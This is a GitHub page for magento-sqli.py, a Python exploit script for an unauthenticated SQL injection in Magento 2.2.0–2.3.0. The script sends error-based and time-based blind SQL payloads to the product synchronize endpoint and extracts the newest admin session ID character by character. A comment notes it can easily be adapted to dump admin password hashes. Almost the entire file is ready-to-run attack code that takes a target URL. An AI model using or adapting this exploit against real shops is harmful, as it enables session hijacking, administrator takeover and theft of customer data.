-
Notifications
You must be signed in to change notification settings - Fork 51
/
magento-sqli.py
executable file
·185 lines (153 loc) · 5.49 KB
/
magento-sqli.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
#!/usr/bin/env python3
# Magento 2.2.0 <= 2.3.0 Unauthenticated SQLi
# Charles Fol
# 2019-03-22
#
# SOURCE & SINK
# The sink (from-to SQL condition) has been present from Magento 1.x onwards.
# The source (/catalog/product_frontend_action/synchronize) from 2.2.0.
# If your target runs Magento < 2.2.0, you need to find another source.
#
# SQL INJECTION
# The exploit can easily be modified to obtain other stuff from the DB, for
# instance admin/user password hashes.
#
import requests
import string
import binascii
import re
import random
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def run(url):
sqli = SQLInjection(url)
try:
sqli.find_test_method()
sid = sqli.get_most_recent_session()
except ExploitError as e:
print('Error: %s' % e)
def random_string(n=8):
return ''.join(random.choice(string.ascii_letters) for _ in range(n))
class ExploitError(Exception):
pass
class Browser:
"""Basic browser functionality along w/ URLs and payloads.
"""
PROXY = None
def __init__(self, URL):
self.URL = URL
self.s = requests.Session()
self.s.verify = False
if self.PROXY:
self.s.proxies = {
'http': self.PROXY,
'https': self.PROXY,
}
class SQLInjection(Browser):
"""SQL injection stuff.
"""
def encode(self, string):
return '0x' + binascii.b2a_hex(string.encode()).decode()
def find_test_method(self):
"""Tries to inject using an error-based technique, or falls back to timebased.
"""
for test_method in (self.test_error, self.test_timebased):
if test_method('123=123') and not test_method('123=124'):
self.test = test_method
break
else:
raise ExploitError('Test SQL injections failed, not vulnerable ?')
def test_timebased(self, condition):
"""Runs a test. A valid condition results in a sleep of 1 second.
"""
payload = '))) OR (SELECT*FROM (SELECT SLEEP((%s)))a)=1 -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
return r.elapsed.total_seconds() > 1
def test_error(self, condition):
"""Runs a test. An invalid condition results in an SQL error.
"""
payload = '))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE %s) -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
if r.status_code not in (200, 400):
raise ExploitError(
'SQL injection does not yield a correct HTTP response'
)
return r.status_code == 400
def word(self, name, sql, size=None, charset=None):
"""Dichotomically obtains a value.
"""
pattern = 'LOCATE(SUBSTR((%s),%d,1),BINARY %s)=0'
full = ''
check = False
if size is None:
# Yeah whatever
size_size = self.word(
name,
'LENGTH(LENGTH(%s))' % sql,
size=1,
charset=string.digits
)
size = self.word(
name,
'LENGTH(%s)' % sql,
size=int(size_size),
charset=string.digits
)
size = int(size)
print("%s: %s" % (name, full), end='\r')
for p in range(size):
c = charset
while len(c) > 1:
middle = len(c) // 2
h0, h1 = c[:middle], c[middle:]
condition = pattern % (sql, p+1, self.encode(h0))
c = h1 if self.test(condition) else h0
full += c
print("%s: %s" % (name, full), end='\r')
print(' ' * len("%s: %s" % (name, full)), end='\r')
return full
def get_most_recent_session(self):
"""Grabs the last created session. We don't need special privileges aside from creating a product so any session
should do. Otherwise, the process can be improved by grabbing each session one by one and trying to reach the
backend.
"""
# This is the default admin session timeout
session_timeout = 900
query = (
'SELECT %%s FROM admin_user_session '
'WHERE TIMESTAMPDIFF(SECOND, updated_at, NOW()) BETWEEN 0 AND %d '
'ORDER BY created_at DESC, updated_at DESC LIMIT 1'
) % session_timeout
# Check if a session is available
available = not self.test('(%s)=0' % (query % 'COUNT(*)'))
if not available:
raise ExploitError('No session is available')
print('An admin session is available !')
# Fetch it
sid = self.word(
'Session ID',
query % 'session_id',
charset=string.ascii_lowercase + string.digits,
size=26
)
print('Session ID: %s' % sid)
return sid
run(sys.argv[1])